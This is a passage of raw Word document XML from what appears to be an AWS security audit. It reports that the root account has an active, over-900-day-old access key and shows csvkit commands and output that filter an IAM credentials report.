        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&lt;root_account&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="78"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access_key_1_active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="78"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="78"/>
          <w:w w:val="150"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access_key_2_active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>respectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="331" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following command extracts the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CSV credentials report:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>csvcut -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"user,access_key_1_active,access_key_2_active"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>status_reports_Wed-Jan-04-2023.csv | csvgrep -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user -m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"root" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>csvlook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="2402" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>| access_key_1_active | access_key_2_active </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="2402" w:val="left" w:leader="none"/>
          <w:tab w:pos="4579" w:val="left" w:leader="none"/>
          <w:tab w:pos="6756" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="484985856">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1497285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>95208</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="880110" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="93" name="Graphic 93"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="93" name="Graphic 93"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="880110" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="880110" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="879798" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="9144">
                          <a:solidFill>
                            <a:srgbClr val="323232"/>
                          </a:solidFill>
                          <a:prstDash val="dash"/>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8330624" from="117.896477pt,7.49673pt" to="187.17191pt,7.49673pt" stroked="true" strokeweight=".72pt" strokecolor="#323232">
                <v:stroke dashstyle="dash"/>
                <w10:wrap type="none"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="484986368">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2565606</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>95208</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1194435" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="94" name="Graphic 94"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="94" name="Graphic 94"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1194435" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1194435" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1194011" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="9144">
                          <a:solidFill>
                            <a:srgbClr val="323232"/>
                          </a:solidFill>
                          <a:prstDash val="dash"/>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8330112" from="202.016251pt,7.49673pt" to="296.03291pt,7.49673pt" stroked="true" strokeweight=".72pt" strokecolor="#323232">
                <v:stroke dashstyle="dash"/>
                <w10:wrap type="none"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="484986880">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3948150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>95208</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1194435" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="95" name="Graphic 95"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="95" name="Graphic 95"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1194435" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1194435" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1194011" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="9144">
                          <a:solidFill>
                            <a:srgbClr val="323232"/>
                          </a:solidFill>
                          <a:prstDash val="dash"/>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8329600" from="310.877991pt,7.49673pt" to="404.89465pt,7.49673pt" stroked="true" strokeweight=".72pt" strokecolor="#323232">
                <v:stroke dashstyle="dash"/>
                <w10:wrap type="none"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="4084" w:val="left" w:leader="none"/>
          <w:tab w:pos="6162" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| &lt;root_account&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>True </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>False </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>ago</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="133"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="331" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="369"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following command extracts the date when the access key was created from the CSV credentials report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>csvcut -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"user,access_key_1_last_rotated"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>status_reports_Wed-Jan-04-2023.csv | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>csvgrep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-c user -m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"root" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>csvlook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
